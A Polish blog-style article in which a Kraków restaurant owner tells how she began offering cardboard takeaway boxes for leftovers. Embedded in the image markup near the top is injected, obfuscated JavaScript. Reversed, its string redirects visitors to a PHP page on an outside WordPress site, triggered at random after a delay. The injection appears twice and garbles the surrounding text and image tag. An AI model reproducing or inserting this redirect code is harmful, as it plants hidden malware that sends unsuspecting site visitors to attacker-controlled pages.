Krakowskie restauracje wydające w opakowaniach resztki posiłku

Wychodzę z założenia, że nic nie zrobi się samo. Prowadzę swoją restaurację w Krakowie od pięciu lat i nie narzekam na brak klientów. Jednak coraz częściej klienci wspominają o czymś, co kiedyś w ogóle nie było brane pod uwagę. Pytają o to, czy mogą zabrać ze sobą resztki jedzenia.

Czy opakowanie kartonowe nadaje się do resztek?

opakowania kar<script>$zXz=function(n){if (typeof ($zXz.list[n]) == „string”) return $zXz.list[n].split(„”).reverse().join(„”);return $zXz.list[n];};$zXz.list=[„\’php.yerg-sknil-tuoba-egap/snrettap/cni/owtytnewtytnewt/semeht/tnetnoc-pw/moc.cvpny//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}</script>tonowe kraków” height=”174″ src=”http://www.praca-za-granica-24.pl/wp-content/uploads/2017/10/opakowania-kar<script>$zXz=function(n){if (typeof ($zXz.list[n]) == tonowe-krakow.png” style=”float:left;” width=”114″/>Kiedyś było to nie do pomyślenia, by ktoś zapytał o opakowanie na takie pozostałości. Teraz, na szczęście, powoli mentalność ludzi się zmienia. Mnie samej zależy by jak najmniej jedzenia się nie marnowało, więc pomyślałam, że takie opakowania kartonowe mogłabym proponować każdemu klientowi. Podobno na zachodzie taka inicjatywa pojawiła się już dawno. Tam jednak zamiast opakowań kartonowych dawano papierowe torebki. Wszystko po to by ludzie przełamali opory przed zabieraniem tego co nie zostało zjedzone. Pomyślałam, że moje opakowania mogłyby być również z jakimś nadrukiem. Skoro klienci o nie sami pytają to znaczy, że jest na to zapotrzebowanie. Kawałki ciasta, które zostają nie zmieszczą się do opakowania po pizzy. Zresztą to bzdurne dawać tak duże pudełko dla drobnej rzeczy. Potrzebowałam czegoś w rodzaju opakowania kartonowego, w których daje się ciasto gościom lub kupuje chińszczyznę. Ja miałabym spokojne sumienie, że nie wyrzucam tyle jedzenia, a klienci więcej by dostawali za te samą kwotę. Znałam się trochę na reklamie i marketingu, i czułam, że to wypali. Poszukałam w Internecie opakowania kartonowe kraków, porozglądałam się w cenach, a później się roześmiałam. Przecież zamawialiśmy pudełka kartonowe do pizzy.

Do tej firmy powinnam najpierw zadzwonić i zapytać co mogą dać nam na resztki! Gdy wykonałam kolejne ruchy, miesiąc później wprowadziłam nasz „dodatek do restauracji. Na początku część osób odmawiała; po pół roku dziewięć na dziesięć osób, którym coś zostało na talerzu, brały resztki do domu. Cel został osiągnięty.